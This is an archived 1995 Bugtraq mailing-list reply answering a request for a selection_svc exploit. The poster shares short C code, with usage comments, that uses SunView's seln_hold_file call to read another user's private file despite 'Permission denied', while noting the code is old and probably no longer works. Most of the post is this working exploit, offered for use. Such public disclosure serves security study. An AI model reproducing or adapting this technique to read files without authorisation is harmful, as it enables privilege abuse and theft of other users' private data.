Bugtraq mailing list archives
Re: selection_svc exploit?
From: jkb () mrc-lmb cam ac uk (Bonfield James)
Date: Fri, 24 Mar 1995 08:51:42 +0000 (GMT)
Paul "Shag" Walmsley wrote:
On Thu, 23 Mar 1995, Mike Neuman wrote:Does anyone have a selection_svc exploit? I know what the problem is,What is the problem?
Well I've got some code that's been kicking around for years (5 or so maybe), that exploits a Sunview selection_svc problem. I doubt if it's the same bug as more recent selection_svc holes, but I do wonder whether people ever learn from past problems. I doubt this code works anymore as I doubt anyone uses Sunview these days. Anyway, thanks to James Beckett (Hiya James!) from whom I snarfed this code oh so long ago. I would leave it up to James to post this code, but I have a feeling he may not have it anymore. James /* SELN_HOLD_FILE * For use where someone has a selection_svc runnning as them, after an * invocation of suntools: * * % cat their_private_file * their_private_file: Permission denied * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow * % ./seln_hold_file their_private_file * % get_selection 2 * < contents of their_private_file > * % */ #include <stdio.h> #include <sys/types.h> #include <suntool/seln.h> main(argc, argv) int argc; char *argv[]; { Seln_result ret; if (argc != 2) { (void) fprintf(stderr, "usage: seln_grab file1\n"); exit(1); } ret = seln_hold_file(SELN_SECONDARY, argv[1]); seln_dump_result(stdout, &ret); printf("\n"); } /* * Local variables: * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsuntool -lsunwindow" * end: * * Static required because _mem_ops not included in ld.so */
Current thread:
- selection_svc exploit? Mike Neuman (Mar 23)
- Re: selection_svc exploit? Paul 'Shag' Walmsley (Mar 23)
- Re: selection_svc exploit? Bonfield James (Mar 24)
- Re: selection_svc exploit? Paul 'Shag' Walmsley (Mar 23)